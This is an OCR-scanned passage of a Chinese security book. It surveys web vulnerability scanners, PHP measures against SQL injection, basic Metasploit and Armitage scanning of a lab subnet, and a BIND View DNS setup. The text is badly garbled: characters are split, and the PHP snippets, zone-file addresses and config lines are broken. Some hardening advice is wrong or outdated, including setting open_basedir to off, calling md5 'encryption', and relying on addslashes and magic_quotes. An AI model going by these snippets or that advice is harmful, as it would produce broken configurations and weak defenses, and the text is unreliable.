SQL 注入 ， 跨 站 点 脚本 (XSS) ， 本 地 和 远程 文件 等 。 该 项 目的 目标 是 要 建立 一 个 框架 ， 以 寻 
找 和 开发 Web 应 用 安全 漏洞 ， 很 容易 使 用 和 扩展 ， 可 以 在 BT4/5 中 直接 使 用 它 。 

4. PHPSecurityScanner 


PHPSecurityScanner 能 够 扫描 PHP 代码 中 是 否 存在 漏洞 。 采用 MySQL 数据 库存 储 搜索 模 
型 和 搜索 结果 ， 该 工具 能 够 扫描 文件 系统 中 的 任何 目录 。 


1.12.4 Fast-Track 


Fast-Track 是 一 个 基于 Python 的 开源 项 目 ， 它 的 Web 接口 默认 情况 下 工作 在 667 端口 ， 
它 的 主要 功能 是 帮助 网 络 安全 管理 人 员 寻 找 网 络 漏洞 ,或 者 作为 测试 人 员 对 网 络 进 行 渗透 测试 
工作 的 强大 工具 包 。Fast-Track 命令 选项 包括 : 
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-p， 绑 定 到 指定 端口 。 

-file， 可 以 打开 pcap 格式 的 文件 。 
--syslog， 将 日 志 传 到 日 志 服务 器 
--no-macs， 不 收集 MAC 地 址 信息 。 


Fast-Track 也 是 使 用 Metasploit 框架 工作 的 ， 通 过 客户 端 来 实施 渗透 ， 但 它 比 Metasploit 
更 好 的 地 方 是 : 在 检测 SQL 注入 攻击 方面 , 它 具 有 更 多 的 自动 化 渗透 模块 。Fast-Track 提供 了 
交互 模式 的 用 户 接 口 ， 进 入 交互 模式 命令 如 下 ， 接 口 如 图 1.21 和 图 1.22 所 示 。 


#./fast-track.py -i 


图 1.21 Fast-Track 交互 模式 


图 1.22 Fast-Track 主 菜 单 


这 种 方法 和 Metasploit 的 SET 方法 类 似 ， 如 果 熟 悉 Metasploit， 使 用 这 个 工具 将 非常 容易 。 
加 载 Fast-Track Web 前 端 命令 如 下 ， 界 面 如 图 1.23 所 示 ，Changelog 页 面 如 图 1.24 所 示 。 


#./fast-track.py -g \\* 加 载 Web 界面 
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图 1.23 启动 Fast-Track Web 前 端 


fost tack web interfoce 
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图 1.24 Fast-Track 的 Changelog 信息 


这 款 软件 的 主要 功能 还 包括 ， 手 工 注 入 、 暴 力 破 解 、POST 参数 攻击 、 查 询 语句 攻击 ， 可 


T， 


以 对 LAMP 网 站 做 全 面 的 检测 。 


1.12.5 ”商业 软件 


1. Web 安全 漏洞 扫描 器 JSky 


JSky Web 安全 漏洞 扫描 器 是 一 款 简 明 易 用 的 Web 漏洞 扫描 与 漏洞 利用 软件 . 它 能 发 现 并 
解决 现 有 Web 系统 中 存在 的 安全 隐患 。 杜 绝 黑客 攻击 ， 保 护 企 业 核心 资产 。 全 面 支持 如 下 
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Web 漏洞 的 扫描 :”SQL 注入 (SQL Injection) 、 跨 站 脚本 (XSS) 等 等 ，JSky 4.0 版 本 已 经 集 
成 了 Pangolin， 非 常 便于 测试 。 


2. Nessus 


Nessus 号 称 “ 世 界 上 最 流行 的 漏洞 扫描 程序 ， 全 世界 超过 75,000 个 组 织 在 使 用 它 ”。 尽 
管 这 个 扫描 程序 可 以 免费 下 载 得 到 ， 但 是 要 从 Tenable Network Security 更 新 到 所 有 最 新 的 威 
胁 信息 ， 每 年 收取 一 定 费 用 。 

这 款 Web 应 用 程序 扫描 器 ， 只 是 漏洞 扫描 器 (AV) 的 一 种 功能 ,实际 上 ,一些 通用 的 漏 
扫 工 具 如 Nessus、ISS Internet Scanner、Retina、SAINT、Core Impact 等 都 包含 Web 扫描 部 件 。 
如 果 想 选择 最 好 的 Web 漏 扫 工具 ， 可 能 没有 确切 答案 。 因 为 现在 的 Web 应 用 千差万别 ,不 同 
的 项 目 有 着 不 同 的 架构 。 例 如 在 PHP 网 站 上 好 用 的 漏 扫 软 件 在 .NET 站 点 上 却 发 挥 不 出 来 。 所 
以 ， 当 你 的 站 点 出 现 问题 时 ， 真 正 能 修补 漏洞 将 站 点 变 得 更 安全 的 漏 扫 软 件 才 是 最 适合 的 。 


1.12.6 ”小结 


在 商业 WAF 中 , 目前 市 场 上 有 绿 盟 Web 应 用 防火 墙 (NSFOCUS Web Application Firewall)， 
启明 星辰 WAF， 安 恒信 息 梭 子 鱼 WAF， 都 能 够 对 网 站 Web 服务 器 进行 深度 防御 ， 弥 补 了 防 
火 墙 和 IPS 系统 的 不 足 。 但 缺憾 是 价格 不 菲 ， 一 般 单 位 和 公司 都 无 法 承受 , 作为 中 小 企业 可 能 
会 希望 限购 一 款 便宜 的 WAF, 这 里 向 大 家 推荐 FreeWAF, 它 是 基于 ubuntu-12.04-server-amd64 
系统 的 。 FreeWAF 发 布 了 大 小 为 800MB 的 版 本 (下 载 地 址 : http://sourceforge.net/projects/wafw/ 
files/) ，FreeWAF 是 一 款 开源 的 Web 应 用 防火 墙 产品 ， 其 命名 为 FreeWAF， 工 作 在 应 用 层 ， 
对 HTTP 进行 双向 深层 次 检测 : 对 于 来 自 Internet 的 攻击 进行 实时 防护 ， 避 免 黑 客 利用 应 用 层 
漏洞 非法 获取 或 破坏 网 站 数据 ， 可 以 有 效 地 抵御 黑客 的 各 种 攻击 ， 如 SQL 注入 攻击 、XSS 攻 
击 、CSRF 攻击 、 缓 冲 区 溢出 、 应 用 层 DOS/DDOS 攻击 等 。 


1.13 基于 PHP 的 SQL 注入 防范 


1.13.1 ”服务 器 端的 安全 配置 


1. 数据 库 的 安全 配置 


最 小 权利 法 则 。 应 用 程序 使 用 的 连接 数据 库 的 账户 应 该 只 拥有 必需 的 特权 , 这 样 有 助 于 保 
护 整 个 系统 尽 可 能 少 地 受到 入 侵 者 的 危害 .通过 限制 用 户 权限 ,隔离 了 不 同 账户 可 执行 的 操作 ， 
用 不 同 的 用 户 账户 执行 查询 、 插 入 、 更 新 、 删 除 操作 ， 可 以 防止 原本 用 于 执行 SELECT 命令 
的 地 方 却 被 用 于 执行 INSERT、UPDATE 或 DELETE 命令 。 

用 户 账号 安全 法 则 。 禁 用 默认 的 root 管理 员 账号 ， 新 建 一 个 复杂 的 用 户 名 和 密码 管理 数 
据 库 。 

内 容 加 密 。 有 些 网 站 使 用 SSL/SSH 数据 加 密 ， 但 是 该 技术 只 对 数据 传输 过 程 进行 加 密 ， 
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无 法 保护 数据 库 中 己 有 的 数据 。 目 前 对 数据 进行 加 密 的 数据 库 系 统 很 少 ， 而 利用 PHP 支持 的 
加 密 算法 ， 可 以 在 存储 时 对 数据 进行 加 密 ， 能 更 安全 地 保存 在 数据 库 中 ,在 检索 时 再 对 数据 进 
行 解密 ， 实 现 对 数据 的 加 密 功 能 。 

存储 过 程控 制 。 用 户 应 该 无 权 通 过 SQL 语句 来 实现 对 系统 命令 的 调用 , 这 是 注入 webshell 
时 十 分 危险 的 漏洞 。 

补丁 。 及 时 打上 MySQL 的 最 新 版 本 补丁 。 


2. Web 服务 器 和 操作 系统 的 安全 配置 


关闭 所 有 不 必要 的 网 络 服务 程序 ， 并 对 所 有 提供 网 络 服务 的 软件 (PHP，APACHE) 进行 
必要 更 新 , 确保 安装 的 是 最 新 稳定 版 本 。 将 程序 日 志 存 放 在 一 个 安全 系统 高 的 服务 器 上 ,并 利 
用 工具 软件 对 日 志文 件 进行 分 析 ， 以 便 第 一 时 间 发 现 入 侵 状 况 。 


1.13.2 PHP 代码 的 安全 配置 


(1) 设置 “register globals” 为 off。“register globals” 选 项 设置 启用 / 禁止 PHP 为 用 户 
输入 创建 全 局 变量 ， 设 置 为 off 表示 如 果 用 户 提交 表单 变量 a，PHP 不 会 创建 “&a”， 而 只 会 
创建 “HTTP GET/POST VARS['a]”。 

(2) 设置 “magic_quotes_gpc” 为 on。 该 选项 可 以 将 一 些 输入 的 特殊 字符 自动 转 义 。 

(3) 设置 “open basedir” 为 off。 它 可 以 禁止 指定 文件 目录 之 外 的 文件 操作 ， 有 效 解决 
include() 攻 击 。 

(4) 设置 “display_errors” 为 off。 此 时 禁止 把 错误 信息 显示 在 网 页 上 ， 因 为 这 些 语句 中 
可 能 会 返回 应 用 程序 中 的 有 关 变 量 名 、 数 据 库 用 户 名 、 表 结构 信息 等 。 恶 意 用 户 有 可 能 利用 其 
中 获取 的 有 关 信 息 ， 进 行 注入 攻击 。 也 可 以 设置 此 选项 为 on， 但 是 要 修改 脚本 返回 的 错误 信 
息 ， 使 其 发 生 错 误 时 只 显示 一 种 信息 。 

(5) 设置 “allow_url fopen” 为 off。 这 个 设置 可 以 禁止 远程 文件 功能 。 


1.13.3 ”PHP 代码 的 安全 编写 


(1) intval0 函 数 。 如 果 输 入 整形 的 变量 ， 只 需要 利用 此 函数 即 可 解决 问题 ， 在 执行 查询 
之 前 处 理 变 量 。 如 : 


mysql query (“Ss ELECT * FROM users WHERE user id=".intva 1( $id) ".") 


(2) addslashes0 〇 函数 。 此 函数 与 magic_quotes_gpc 功能 一 样 ， 将 一 些 输入 的 特殊 字符 自 
动 转 义 。 它 与 magic_quotes_gpc 设置 与 否 无 冲突 ， 如 : 


mysql query("SELECT * FROM users WHERE username = ".adds lashes ($username) 
nm 
ha ) 
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(3) 传输 数据 加 密 。 如 : 
username=md 5( $HTTP POST VARS["username"]) 


(4) 限制 输入 长 度 与 类 型 。 在 用 户 提交 表单 时 设置 长 度 限 制 ， 可 有 效 阻止 注入 的 猜测 语句 。 


1.13.4 ”小结 


由 于 SQL 注入 攻击 是 针对 应 用 开发 过 程 中 的 编程 漏洞 ， 因 此 对 于 绝 大 多 数 防火 墙 来 说 ， 
这 种 攻击 是 可 以 绕 过 的 。 虽 然 MySQL 数据 库 的 版 本 一 直 在 更 新 ， 但 PHP 与 MySQL 本 身 的 
漏洞 也 越 来 越 少 ， 可 是 随 着 SQL 注入 技术 的 不 断 提高 ， 只 要 Web 应 用 系统 或 PHP 编码 中 仍 
然 存 在 此 类 漏洞 ,就 会 潜伏 着 这 种 隐患 , 特别 是 当 SQL 注入 攻击 与 其 他 一 些 攻击 工具 结合 时 ， 
对 服务 器 乃至 系统 都 是 巨大 的 威胁 。 因 此 研究 SQL 注入 方法 、 如 何 正确 地 对 服务 器 进行 安全 
配置 、 如 何 做 好 代码 的 安全 编写 与 检查 ， 对 于 开发 安全 的 Web 应 用 程序 有 着 重要 意义 。 


1.14 SQL 注入 漏洞 检测 方法 
基本 渗透 测试 


如 果 是 第 一 次 接触 Metasploit 渗透 测试 软件 , 或许 会 被 它 提供 的 很 多 接口 选项 、 变 量 和 模 
块 所 吓 倒 , 网 上 的 各 种 资料 也 不 全 面 和 准确 , 在 工作 中 应 用 此 软件 有 点 天 狗 吃 天 无 从 下 口 的 感 
觉 。 本 节 首 先 回顾 一 些 基 本 工具 ， 然 后 介绍 GUI 界面 的 工具 使 用 方法 ， 让 大 家 能 尽快 上 手 。 

下 面 介绍 如 何 使 用 BT 工具 箱 下 的 Metasploit 的 GUI 工具 armitage， 它 集成 了 Nmap、 
NeXpose 和 Nessus， 能 够 进行 自动 漏洞 发 现 ， 利 用 这 一 特性 可 以 对 企业 内 网 服务 器 的 网 络 配 
置 和 打 补 丁 情况 进行 内 部 审查 , 以 便 找 出 一 些 因 错 误 配 置 和 未 打 齐 的 主机 ,从 而 保障 网 络 安全 。 
MSF 是 Metasploit 系统 最 为 常用 也 是 最 流行 的 用 户 接 口 ， 它 里 面 用 于 渗透 的 工具 琳琅 满目 ， 
可 以 使 用 它 装 载 模块 ， 实 施 检测 、 对 整个 网 段 进行 自动 渗透 测试 等 操作 。 


1. MSF 
以 BT5 系统 为 例 〈 其 他 版 本 也 是 参照 执行 ) ， 启 动 MSF 终端 : 


#msfconsole 


首次 启动 时 由 于 要 初始 化 环境 事件 ， 大 概 需要 2 一 5 分 钟 。MSF 启动 界面 如 图 1.25 所 示 。 
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图 1.25 MSF 启动 界面 
MSF 系统 升级 命令 如 下 : 
#msfupdate 


升级 完成 后 ， 所 下 载 的 文件 存放 在 /opt/framework/msf3/ 目 录 下 ， 大 约 800MB。 
下 载 时 根据 网 络 情况 ， 有 时候 在 升级 时 候 会 遇 到 错误 提示 ， 例 如 : 


svn: GET of '/svn/!svn/ver/1609/framework3/trunk/lib/anemone/page.rb':could 


not connect to server (https://www.metasploit.com) 
在 重新 执行 msfupdate 即 可 ， 升 级 过 程 中 不 要 强行 终止 。 
2. Armitage 


Armitage 是 一 个 使 用 Java 开发 而 且 完全 开源 的 图 形 化 Metasploit 网 络 渗透 工具 ， 输 入 以 
下 命令 ， 启 动 Metasploit 图 形 化 界面 ， 如 图 1.26 所 示 。 


#armitage 


DD Use ssL 

User mef 

Pass 2<c9497eb3f43354 
DB Driver postgresql Ee] 


DB Connect String 


rr re 
图 1.26 启动 Metasploit 图 形 化 界面 


在 图 1.26 所 示 的 界面 上 ， 单 击 Start MSF 按钮 ， 启 动 Metasploit 主 界面 ， 如 图 1.27 所 示 。 
在 主 界面 菜单 上 添加 需要 扫描 的 主机 也， 也 可 以 输入 : 192.168.11.0/24。 


310"@127.0.0. 
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Thu Feb 14, 9:47 PM 


图 1.27 添加 数据 库 服 务 器 主机 IP 的 菜单 
其 他 操作 界面 如 图 1.28、 图 1.29、 图 1.30 所 示 ， 这 里 就 不 用 文字 详细 说 明了 。 


图 1.29 分 析 主机 服务 的 漏洞 2 
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Cr WI sy sten3> 


图 1.30 远程 打开 主机 交互 界面 
3. 渗透 日 志 
当 渗 透 测 试 完成 时 ,系统 会 在 当前 目录 下 建立 .armitage 目录 , 下 面 按照 日 期 建立 了 若干 目 


录 , 例如 2013 年 2 月 14 日 的 目录 表示 为 130214， 其 目录 下 会 根据 每 个 渗透 IP 分 别 建立 子 目 
录 ， 还 会 有 个 汇总 目录 all， 所 有 操作 显示 日 志 会 存放 在 那里 的 。 在 console.log 日 志文 件 中 ， 


当然 也 还 有 nmap.log 等 扫描 记录 的 日 志 结果 ， 如 图 1.31 所 示 。 


x ,armitage - File Browser 


‘armitage 1 


Personal = [Name Sie Type Date Modified 
态 roct 懈 30214 2 ltems folder Thu 14 Feb 2013 10:01:23 PM CST 
国 Desktop 


-= 请 192.168.11.105 1 item folder Thu 14 Feb 2013 10:01:23 PM CST 
DO mash 


cmd 1 1612og 。 104.6 KB application log Thu 14 Feb 2013 10:03:11 pM CST 
@ esysen ES 2 items folder Thu 14 Feb 2013 09:48:44 PM CST 
Vuwa.. 入 国 consolelog 38.3 KB application log Fr 15 Feb 2013 10:10:31 PM CST 


昌 Floppy Dr nmapilog 13.5 KB application log Thu 14 Feb 2013 10:31:42 PM CST 
Network 疝 30215 2 items folder Fri 15 Feb 2013 10:13:53 PM CST 
IB Entire net. + 剧 192.168.11.109 1 item folder Fri 15 Feb 2013 10:13:53 PM CST 
SE litem folder Fri 15 Feb 2013 10:23:03 AM CST 

三 丽 boae 1 ltem folder Sat 16 Feb 2013 03:09:19 PM CST 

El 1item folder Sat 16 Feb 2013 03:09:19 PM CST 

三 而 ao 2 items folder Sun 17 Feb 2013 08:45:05 AM csT 

避 忆 192.168.11.109 2 items folder Sun 17 Feb 2013 09:42:56 AM CST 

五 琢 岂 2 items folder Sun 17 Feb 2013 10:35:17 AM CST 


"console.log" selected (38.3 KB) 


图 1.31 all 目录 下 的 文件 


更 多 信息 请 参看 http://www.fastandeasyhacking.com/manual。 
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1.15 ”BIND View 实现 网 通电 信 互 访 


1.15.1 背景 


本 案例 通过 BIND View 功能 来 建立 DNS 服务 系统 ， 实 现 网 通 和 电信 互 访 。 对 于 运行 关 
键 业 务 的 电子 商务 网 站 有 一 定 借鉴 作用 , 在 原 中 国电 信 南 北 分 家 后 , 出 现 了 北方 的 中 国 网 通 和 
南方 的 中 国电 信 。 由 于 南北 网 络 之 间 的 互联 互通 问题 , 随 之 出 现 南方 用 户 访问 北方 网 站 或 北方 
用 户 访 部 南方 网 站 速度 较 慢 的 现象 。 该 问题 出 现 的 根本 原因 在 于 南北 网 络 的 互联 互通 节点 拥 
塞 ， 造 成 用 户 丢 包 、 延 迟 较 大 ， 从 而 导致 访问 缓慢 ， 甚 至 无 法 访问 某 些 应 用 。 如 何 才能 以 一 种 
更 具 普 遍 性 的 方式 来 解决 该 互 访问 题 呢 ? 本 文 将 通过 BIND View 功能 来 实现 。 

笔者 所 在 公司 兼职 做 过 一 家 主 做 游戏 服务 的 网 站 ， 所 以 网 站 速度 和 访问 量 对 公司 至 关 重 
要 。 由 于 网 站 使 用 的 是 中 国电 信 的 IP 地 址 ， 使 得 北方 用 户 在 使 用 该 网 站 时 频频 出 现 问题 。 对 
于 一 个 运行 关键 业务 的 电子 商务 网 站 来 说 , 保证 用 户 的 访问 速度 和 访问 成 功率 非常 重要 。 为 了 
加 快 公司 访问 量 、 确 保 公司 域名 解析 的 服务 ， 公 司 决定 建立 一 个 自己 的 域名 解析 服务 器 系统 ， 
用 来 解决 网 通 和 电信 用 户 在 访问 公司 网 站 时 的 访问 速度 及 其 他 相关 问题 。 

笔者 采用 的 方案 是 利用 BIND 9 的 新 增 功能 -View, 为 公司 建立 一 个 DNS 服务 系统 。 这 是 
一 个 全 新 的 方法 ， 在 实施 的 过 程 中 ， 由 于 以 前 没有 类 似 项 目 可 供 借鉴 ， 也 没有 更 多 详细 说 明 
View 功能 的 资料 ， 因 此 颇 费 了 一 番 周 折 。 对 于 一 些 初级 管理 员 和 较 少 接触 BIND 的 人 来 说 ， 
使 用 这 一 方法 在 开始 时 会 有 些 困难 , 所 以 本 文 是 写 给 那些 还 在 初期 摸索 的 朋友 , 希望 将 经 验 与 
大 家 共享 。 本 文 没有 过 多 介绍 关于 DNS 的 原理 和 基础 知识 ， 这 里 假设 读者 已 经 了 解 和 掌握 基 
本 知识 ， 如 有 不 清楚 的 读者 可 以 自行 查 况 相关 资料 。 


1.15.2 选择 BIND 解决 方案 


首先 , 来 分 析 一 个 网 络 现状 和 系统 需求 。 系 统 要 解决 的 是 电信 和 网 通 互 访问 题 , 具体 表现 
为 速度 减 慢 等 。 其 次 ， 由 于 现在 的 网 络 存在 很 多 私有 了 P 地 址 即 内 网 下， 在 它们 访问 互联 网 时 
必须 通过 一 些 转换 及 映射 工具 来 实现 互 访 ,因此 还 需要 解决 一 个 内 网 他 和 外 网 也 的 区 别 问 题 。 
另外 ， 出 于 对 公司 和 网 站 安全 性 考虑 ， 需 要 限制 某 些 IP 地 址 访问 网 站 , 或 者 将 这 些 来 访 亿 段 
指向 其 他 地 方 。 

通过 以 上 分 析 ， 拟 定 了 如 下 几 种 解决 方案 : 


@ 利用 Linux 防火 墙 设置 工具 iptables 来 配置 动态 DNS。 核 心思 想 是 在 DNS 服务 器 上 
运行 多 个 BIND， 每 个 BIND 为 来 自 不 同 区 域 的 用 户 提供 解析 ， 这 样 每 个 BIND 都 应 
有 不 同 的 配置 文件 和 域 文件 。 在 接收 到 客户 访问 时 , 根据 不 同 的 IP 地 址 将 请 求 重 定向 
到 不 同 BIND。 这 一 方法 的 缺点 是 过 于 复杂 ， 并 且 不 能 解决 MX 记录 问题 。 

利用 BIND 9 的 Cache 记录 。 该 方法 实际 上 是 解决 了 内 外 DNS 的 解析 问题 。 

设置 内 外 DNS， 并 用 ACL 做 进一步 限制 。 这 一 方法 的 缺点 是 机 器 使 用 较 多 。 

利用 BIND 9 的 View 功能 。 这 是 上 述 几 种 方法 中 最 易 理 解 和 实现 的 。 

@ 可 以 利用 一 些 硬件 工具 来 解决 。 


。76 。 
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基于 上 面 提出 的 几 种 解决 方法 ， 经 过 综合 考虑 ， 决 定 利用 BIND 9 的 View 功能 来 实现 互 
访 。 简 单 地 说 ，BIND View 功能 可 以 实现 DNS 对 不 同 网 段 返回 不 同 地 址 ， 即 对 不 同 也 地 址 
段 发 来 的 查询 响应 不 同 的 DNS 解析 。 该 方案 从 实施 复杂 度 和 投入 资金 等 方面 都 有 较 大 优势 。 
不 足 之 处 是 在 安全 性 方面 有 待 提高 ， 以 及 存在 一 些 漏洞 等 。 


1.15.3 BIND View 方案 


1. 所 用 系统 及 配置 文件 


这 里 使 用 的 服务 器 版 本 是 Red Hat Enterprise Linux 3.0。 为 了 确保 公司 域名 服务 器 能 够 不 
间断 运行 ， 同 时 架设 两 台 DNS 服务 器 (Master 和 Slave0) 。 这 里 将 着 重 介绍 建立 在 Linux 系 
统 上 的 Master 主 DNS 服务 器 系统 。 

Berkeley Internert Name Domain (BIND ) 是 一 个 被 人 熟知 的 域名 软件 ， 具 有 广泛 的 使 用 基 
础 ， 互 联网 上 的 绝 大 多 数 DNS 服务 器 都 是 基于 该 软件 。BIND 目前 由 ISC (Internet Software 
Consortium) 负责 维护 ， 有 具体 开发 由 Nominum 公司 完成 。 

从 BIND 官方 网 站 http:/www.isc.org/bind 可 以 下 载 它 的 最 新 版 本 。 安装 完成 后 , 在 /etc 目 
录 中 会 有 hosts 、hosts.conf、resolv.conf、named.boot 和 named.conf 等 配置 文件 。 

(1) hosts 文件 定义 了 主机 名 与 瑟 地 址 的 对 应 ， 其 中 包括 将 要 运行 DNS 的 服务 器 的 下 地 
址 和 主机 名 。hosts 文件 的 内 容 形式 如 下 : 


127.0.0.1 localhost. 


Localdomain localhost 


(2) hosts.conf 文件 的 内 容 如 下 : 


Order hosts, bind 
Multi on 


Nospoof on 


order hosts bind 语句 指定 对 主机 名 的 解析 顺序 是 先 在 hosts 中 查找 , 然后 到 DNS 服务 器 记 
录 中 查找 。mnulti on 则 允许 一 个 主机 名 对 应 多 个 人 P 地 址 。 


(3) resolv.conf 文件 内 容 如 下 : 


search linux.com 


nameserver 国电 


nameserver 卫 指定 DNS 服务 器 的 地 址 。 注 意 ， 该 文件 对 普通 非 Windows 系统 的 DNS 服 
务 器 (Windows 系统 在 “网 络 属性 ”中 设置 该 项 ) 来 说 必 不 可 少 。 如 果 没 有 设置 本 机 为 DNS 
服务 器 ， 又 要 求 能 够 解析 域名 ， 就 必须 指定 DNS 服务 器 地 址 。 最 多 可 以 写 入 三 个 地 址 ， 作 为 
前 一 个 失败 时 的 候选 DNS 服务 器 。 

(4) named.boot 文件 是 早期 版 本 BIND 4 所 用 的 配置 文件 ， 新 版 本 中 已 经 让 位 于 


named.conf。 
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(5) named.conf 是 DNS 服务 器 配置 的 核心 文件 。 
以 上 只 是 简单 说 明 设 置 DNS 服务 器 时 涉及 的 配置 文件 , 后 文 将 主要 介绍 named.conf 中 的 
具体 设置 选项 。DNS 的 具体 配置 过 程 及 BIND 的 详细 安装 步骤 可 以 参阅 其 他 资料 。 


2. View 语法 介绍 
View 功能 很 容易 理解 ， 就 是 将 不 同 IP 地 址 段 发 来 的 查询 响应 到 不 同 的 DNS 解析 。 例 如 
需要 对 三 个 不 同 人 P 地 址 段 进行 配置 ， 就 需要 明确 这 些 IP 地 址 段 ， 这 样 View 功能 才 会 有 效 。 


对 于 初学 者 , 简单 了 解 它 的 语法 非常 必要 。 如 果 要 有 一 个 更 清楚 的 认识 ， 则 可 以 到 BIND 官方 
网 站 查阅 文档 。 下 面 给 出 View 的 语法 : 


View view name[class]{ 
Match -c 1 ient s {address match list}: 
Match-destinations {address match list}: 
Match- recursive-only{yes or no}; 
[view option; …] 
[zone-statistics yes or no; ] 
[zone_statement; …] 


}; 
结合 上 述 语法 重点 解释 其 中 几 项 : 


@ View view_name[class] 是 为 了 区 分 两 个 不 同 的 网 络 而 起 的 一 个 名 字 ， 比 如 在 下 面 View 
的 例子 中 使 用 的 baoku 和 external 等 。 

@ Match - clients {faddress match list} 的 作用 是 定义 一 个 匹配 的 地 址 池 ， 里面 放 入 IP 地 
址 。 在 后 面 的 实际 配置 中 ， 由 于 网 通 的 也 地 址 太 多 ,为 了 防止 意外 发 生 ， 首 先 使 用 了 
控制 访问 列表 : 

acl “subnet”{ 

61.207.0.0/16; 
168.160.224.0/19; 
es 


然后 ， 在 该 语法 中 直接 把 address_match list(IP 地 址 段 ) 写作 subnet。 这 样 可 以 使 View 
整体 看 起 来 更 加 简单 。 当 然 ， 也 可 以 直接 在 {address_match_list} 中 加 入 网 通 的 卫 地址 ， 即 : 


Match-clients{ 网 通 IP 地 址 段 } 


@ Match-recursive-only{yes o u no} 用 于 选择 查询 方式 。 到 底 选 择 yes 还 是 no， 则 要 根 
据 系统 具体 情况 来 决定 。 现在 域名 解析 过 程 一 般 分 为 两 种 ,一 种 是 递归 查询 ( Recursive 
Query )， 它 是 指 当 收 到 DNS 工作 站 的 查询 请 求 后 ， 本 地 DNS 服务 器 只 会 向 DNS 工 
作 站 返回 两 种 信息 ， 即 DNS 服务 器 上 查 到 的 结果 或 是 查询 失败 。 一 般 由 DNS 工作 站 
向 DNS 服务 器 提出 的 查询 请 求 属于 递归 查询 。 另 一 种 是 迭代 查询 (Interative Query )， 
它 是 指 当 收 到 DNS 工作 站 的 查询 请 求 后 ， 如 果 在 DNS 服务 器 中 没有 查 到 所 需 数据 ， 


该 DNS 服务 器 便 会 告诉 DNS 工作 站 另外 一 台 DNS 服务 器 的 IP 地 址 ， 然 后 由 DNS 
工作 站 自行 向 此 DNS 服务 器 查询 ， 直 到 找到 或 失败 为 止 。 因 此 ， 选 择 yes 表示 使 用 递 
归 查 询 ， 和 否则 表示 使 用 迁 代 查询 。 

3. View 的 简单 实例 

下 面 给 出 View 的 一 个 简单 实例 ， 参 照 上 面 的 解释 可 以 进一步 地 了 解 View 的 用 法 。 


1.15.4 方案 实施 步 聚 
1. 基本 设置 
下 面 结合 实际 搭建 过 程 和 namd.conf 的 具体 设置 ， 详 细 说 明 应 该 注意 的 方面 。 在 本 例 中 ， 
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选用 linux.com 做 为 本 地 域名 ，nsl 为 本 地 主机 名 ， 卫 地 址 为 61.56.123.5 〈 这 是 一 个 虚拟 的 电 
信和 下 地 址 )。 为 了 让 网 通 和 电信 的 用 户 都 能 快速 访问 本 网 站 , 网 站 另外 还 有 一 个 网 通 I 了 P 地址。 

本 例 把 网 通 命 名 为 crece， 电 信和 命名 为 tel， 定 义 了 两 个 域名 来 同时 使 用 一 台 DNS 服务 器 ， 
并 且 在 /varnamed/ 下 建立 相应 的 目录 结构 和 域名 文件 。 


(1) 对 应 区 文件 的 建立 


在 /var/named 下 分 别 建立 相应 的 cnc 和 tel 目录 ， 在 目录 下 分 别 建立 相应 的 区 文件 linux.com、 
db.linux.com 和 idg.linux.com 等 。 例如, 网 通 即 cnc 目录 中 建立 的 linux.com。 文件 的 内 容 如 下 : 


$TTL 900 
@ IN SOR 
nsl.linux.com. 
root.linux.com.( 
20050615; Serial 
28800; Refresh 
14400; Retry 
3600000; Expire 
86400); Minimum 
linxu.com. INnsl.linux.com 
nsl IN A 61:56-:123:5 
aaalIN A 221.12:160-93 bbb IN A221-.12.160.93 
linux.com. IN 221.12.160.92 
mail2 IN A 61.157.39.100 


上 述 内 容 只 是 一 个 列子 ， 各 公司 或 企业 可 以 根据 不 同 要 求 具体 给 出 区 文件 的 内 容 。tel 目 
录 中 的 文件 内 容 与 此 类 似 ， 修 改 相 应 P 地 址 即 可 。 


(2) 主 配 置 文 件 的 设 定 
这 里 将 根据 网 通 和 电信 的 人 P 地 址 ， 让 DNS 对 不 同 网 段 返 回 不 同 的 地 址 解析 : 


options{ 
directory"/var/named"; 

// 配 置 文件 所 在 目录 

Pid-file "/var/run/named.pid "; 

// 进 程 守护 文件 

Statistics-file "/var/run/named.stats" 
// 状 态 输出 文件 ， 在 rndc 中 用 到 
//query-source address *port 53; 
allow-recursion {ournets; }; 
} 


//a caching only nameserver config 
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recursion no; 
//match-cliwnts{any; } 对 应 上 面 的 match-clients{"subnet"; }， 即 除了 上 面 列 出 的 
IP 地 址 外 ， 其 余 都 去 访问 tel 中 的 文件 
Zone “linux.com”IN { 
type master; 
file "tel\linux.com”; 
} 了 
zone “0.0.61.in.addr.ara”IN { 
type master; 
file "tel\db.0.0.61”; 


后 
Zone “idglinux.com’”IN { 
type master; 
file"tel\idglinux.com”; 
}; 
hs 


如 上 设置 完成 后 ， 当 网 通用 户 和 电信 用 户 访问 该 网 站 时 , DNS 的 View 功能 会 根据 不 同 的 
地 址 段 指向 分 别 相对 应 的 区 文件 。 


2. 问题 分 析 


在 系统 设置 的 过 程 中 “named-g” 起 到 很 大 作用 ， 发 现 了 很 多 DNS 的 问题 ， 包 括 named 
权限 问题 ， 以 及 区 文件 里 的 语法 错误 等 。 通 过 具体 实践 ， 读 者 会 有 更 深切 的 体会 。 

如 上 设置 完成 后 是 否 就 可 以 顺利 地 看 到 结果 了 呢 ? 不然。 这 还 需要 根据 DNS 服务 提供 的 
具体 情况 。 由 于 笔者 公司 是 由 DNS 服务 提供 商 来 提供 网 站 解析 服务 ， 所 以 需要 面 对 一 个 如 何 
让 所 配置 DNS 服务 合法 起 作用 的 问题 ， 即 如 何 使 用 户 在 访问 该 网 站 自己 的 DNS 服务 器 解析 。 
通过 与 服务 提供 商 协调 ， 一 家 DNS 服务 提供 商 允 许 我 们 修改 其 区 文件 ， 在 其 中 添加 一 条 A 记 
录 指 向 网 站 自己 的 DNS 服务 器 ， 从 而 解决 了 这 一 问题 。 当 建立 了 Slave 辅助 服务 器 后 ， 最 好 
不 要 采取 这 一 方式 ， 以 避免 引起 混淆 在 这 种 情况 下 可 以 直接 注册 一 个 自己 的 DNS 服务 。 


1.15.5 小结 


本 节 介 绍 了 使 用 BIND View 功能 架设 DNS 简单 过 程 ， 其 中 还 有 很 多 东西 值得 深究 ， 比 如 
网 络 加 强 安全 问题 等 。 在 本 例 中 ， 笔 者 通过 关闭 该 DNS 服务 器 上 的 所 有 无 关 端 口 ， 并 建立 相 
应 iptables 防火 墙 规则 来 保证 网 络 安全 。 还 可 以 使 用 最 新 BIND 9 版 本 来 设置 一 个 在 chroot 环 
境 下 运行 的 BIND 的 安全 性 。 将 BIND chroot 到 /chnamed 目录 运行 ， 则 named 在 运行 时 将 
